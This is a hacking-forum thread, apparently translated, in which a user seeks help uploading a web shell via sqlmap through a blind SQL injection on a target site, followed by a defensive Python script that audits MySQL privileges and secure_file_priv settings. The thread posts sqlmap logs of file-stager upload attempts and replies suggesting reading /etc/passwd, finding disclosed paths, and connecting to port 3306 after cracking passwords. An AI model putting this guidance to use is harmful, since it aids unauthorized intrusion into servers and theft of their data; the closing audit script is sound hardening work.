sqlmap shell upload

Discussion in 'Sandbox' started by hackworld, 6 Nov 2019.

  1. hackworld

    hackworld New Member

    Joined:
    26 Jun 2019
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Good afternoon, I'm asking for help with sqlmap, I can't upload a shell no matter what.
    The user has the privileges
    --is-dba: True
    %lotos% (administrator) [28]:
    privilege: ALTER
    privilege: ALTER R
    privilege: CREATE
    privilege: CREATE
    privilege: CREATE
    privilege: CREATE
    privilege: CREATE
    privilege: CREATE
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TA
    privilege: PROCESS
    privilege: REFEREN
    privilege: RELOAD
    privilege: REPLICA
    privilege: REPLICA
    privilege: SELECT
    privilege: SHOW DA
    privilege: SHOW VI
    privilege: SHUTDOW
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE

    SELECT @@GLOBAL.secure_file_priv;
    '/var/lib/mysql-files/'
     
  2. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Where are the logs of what you did? Where is the server's response? Or are we supposed to imagine what you did and what isn't working?
     
  3. hackworld

    hackworld New Member

    web application technology: Nginx
    back-end DBMS: MySQL >= 5.0.12
    [12:20:48] [INFO] going to use a web backdoor for command prompt
    [12:20:48] [INFO] fingerprinting the back-end DBMS operating system
    [12:20:48] [INFO] the back-end DBMS operating system is Linux
    which web application language does the web server support?
    [1] ASP
    [2] ASPX
    [3] JSP
    [4] PHP (default)
    > 4
    do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
    [12:21:00] [WARNING] unable to automatically retrieve the web server document root
    what do you want to use for writable directory?
    [1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default)
    [2] custom location(s)
    [3] custom directory list file
    [4] brute force search
    > 1
    [12:21:04] [WARNING] unable to automatically parse any web server path
    [12:21:04] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
    [12:21:04] [INFO] heuristics detected web page charset 'ascii'
    [12:21:04] [WARNING] unable to upload the file stager on '/var/www/'
    [12:21:04] [INFO] trying to upload the file stager on '/var/www/i/pages/' via LIMIT 'LINES TERMINATED BY' method
    [12:21:05] [WARNING] unable to upload the file stager on '/var/www/i/pages/'
    [12:21:05] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
    [12:21:06] [WARNING] unable to upload the file stager on '/var/www/html/'
    [12:21:06] [INFO] trying to upload the file stager on '/var/www/html/i/pages/' via LIMIT 'LINES TERMINATED BY' method
    [12:21:07] [WARNING] unable to upload the file stager on '/var/www/html/i/pages/'
    [12:21:07] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
    [12:21:07] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/'
    [12:21:07] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/i/pages/' via LIMIT 'LINES TERMINATED BY' method
    [12:21:08] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/i/pages/'
    [12:21:08] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via LIMIT 'LINES TERMINATED BY' method
    [12:21:09] [WARNING] unable to upload the file stager on '/var/www/nginx-default/'
    [12:21:09] [INFO] trying to upload the file stager on '/var/www/nginx-default/i/pages/' via LIMIT 'LINES TERMINATED BY' method
    [12:21:10] [WARNING] unable to upload the file stager on '/var/www/nginx-default/i/pages/'
    [12:21:10] [INFO] trying to upload the file stager on '/srv/www/' via LIMIT 'LINES TERMINATED BY' method
    [12:21:10] [WARNING] unable to upload the file stager on '/srv/www/'
    [12:21:10] [INFO] trying to upload the file stager on '/srv/www/i/pages/' via LIMIT 'LINES TERMINATED BY' method
    [12:21:11] [WARNING] unable to upload the file stager on '/srv/www/i/pages/'
    [12:21:11] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 43 times
     
  4. b3

    b3 Banned

    Why so many 404s, is there a WAF? Is the path to doc_root known, or are you guessing?
     
  5. hackworld

    hackworld New Member

    The path is not known, it's sqlmap's default list.
    There doesn't seem to be a WAF, but the SQL injection itself is of this type:
    Parameter: lang (GET)
    Type: boolean-based blind
     
  6. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    Well then, first look for an error on the sites that would disclose the path to you.
     
  7. hackworld

    hackworld New Member

    That's clear, I looked and didn't find one; I thought maybe someone would suggest some other option.
     
  8. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    239
    Likes Received:
    809
    Reputations:
    212
    How?
     
  9. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    Try first
    --file-read="/etc/passwd" if it reads it, then you'll need to find a writable directory and upload there via
    and not by auto-guessing
    UPD
    Didn't notice, Type: boolean-based blind
    You won't be able to upload, you need union
     
  10. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    If you're lucky - 3306 is open, you can connect remotely, and you manage to decrypt the password, then as an option connect to the DB and upload from there, but you still need to find the path
     
    seostock likes this.
  11. hackworld

    hackworld New Member

    It doesn't want to extract the passwords
     
  12. hackworld

    hackworld New Member

    It's written above: --is-dba: True
     
  13. hackworld

    hackworld New Member

    So there are no upload options via blind
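
Seen from the database owner's side, the two settings reported in the first post (the account's privilege list and `@@GLOBAL.secure_file_priv`) are what a hardening audit checks. The sketch below is an added example, not part of the thread and not sqlmap or MySQL code; the account name, the `RISKY` list and the finding codes are assumptions made for illustration.

```python
import posixpath

# Privileges that reach the server's filesystem or runtime; an account used by
# a web application should hold none of them (list chosen for this example).
RISKY = {"FILE", "SUPER", "SHUTDOWN", "RELOAD", "PROCESS"}


def outfile_scope(secure_file_priv):
    """Classify the value of @@GLOBAL.secure_file_priv."""
    if secure_file_priv is None:
        return "disabled"        # NULL: import/export operations are off
    if secure_file_priv == "":
        return "unrestricted"    # empty: no directory restriction at all
    return "confined"            # a directory: file operations limited to it


def _inside(path, root):
    """True when path is root itself or lies below it."""
    path, root = posixpath.normpath(path), posixpath.normpath(root)
    return path == root or path.startswith(root.rstrip("/") + "/")


def audit(account, privileges, secure_file_priv, web_roots):
    """Return (code, detail) findings for one account and server setting."""
    findings = []
    held = sorted(RISKY & {p.upper() for p in privileges})
    if held:
        findings.append(("EXCESS_PRIVS", f"{account}: revoke {', '.join(held)}"))
    if "FILE" not in held:
        return findings
    scope = outfile_scope(secure_file_priv)
    if scope == "unrestricted":
        findings.append(("OUTFILE_ANYWHERE", "set secure_file_priv to a directory or NULL"))
    elif scope == "confined":
        shared = [r for r in web_roots
                  if _inside(secure_file_priv, r) or _inside(r, secure_file_priv)]
        if shared:
            findings.append(("OUTFILE_IN_WEBROOT", f"export dir overlaps {shared}"))
    return findings


# Constructed input: the account name is a placeholder; the secure_file_priv
# value and the web roots are the ones that appear in the thread.
WEB_ROOTS = ["/var/www/", "/var/www/html", "/srv/www"]
GRANTS = ["SELECT", "INSERT", "UPDATE", "FILE", "SUPER", "SHUTDOWN"]

if __name__ == "__main__":
    for value in ("/var/lib/mysql-files/", "", "/var/www/html/export", None):
        print(repr(value), audit("app_user", GRANTS, value, WEB_ROOTS))
```

With the value from the thread, the only finding is the excess privileges on the application account; the export directory itself does not overlap any of the listed web roots.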
     